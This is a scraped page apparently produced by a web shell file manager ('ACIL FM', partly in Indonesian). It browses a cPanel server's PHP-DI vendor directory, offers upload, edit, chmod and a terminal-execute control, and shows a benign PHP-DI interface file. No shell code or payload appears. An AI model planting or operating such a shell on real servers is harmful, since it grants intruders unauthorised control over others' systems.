ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/php-di/php-di/src
/
opt
cpanel
ea-wappspector
vendor
php-di
php-di
src
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Attribute
-
chmod
Open
Rename
Delete
Compiler
-
chmod
Open
Rename
Delete
Definition
-
chmod
Open
Rename
Delete
Factory
-
chmod
Open
Rename
Delete
Invoker
-
chmod
Open
Rename
Delete
Proxy
-
chmod
Open
Rename
Delete
CompiledContainer.php
4.17 MB
chmod
View
DL
Edit
Rename
Delete
Container.php
13.29 MB
chmod
View
DL
Edit
Rename
Delete
ContainerBuilder.php
10.33 MB
chmod
View
DL
Edit
Rename
Delete
DependencyException.php
224 B
chmod
View
DL
Edit
Rename
Delete
FactoryInterface.php
996 B
chmod
View
DL
Edit
Rename
Delete
functions.php
4.36 MB
chmod
View
DL
Edit
Rename
Delete
NotFoundException.php
263 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/php-di/php-di/src/FactoryInterface.php
<?php declare(strict_types=1); namespace DI; /** * Describes the basic interface of a factory. * * @api * * @since 4.0 * @author Matthieu Napoli <matthieu@mnapoli.fr> */ interface FactoryInterface { /** * Resolves an entry by its name. If given a class name, it will return a new instance of that class. * * @param string $name Entry name or a class name. * @param array $parameters Optional parameters to use to build the entry. Use this to force specific * parameters to specific values. Parameters not defined in this array will * be automatically resolved. * * @throws \InvalidArgumentException The name parameter must be of type string. * @throws DependencyException Error while resolving the entry. * @throws NotFoundException No entry or class found for the given name. */ public function make(string $name, array $parameters = []) : mixed; }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply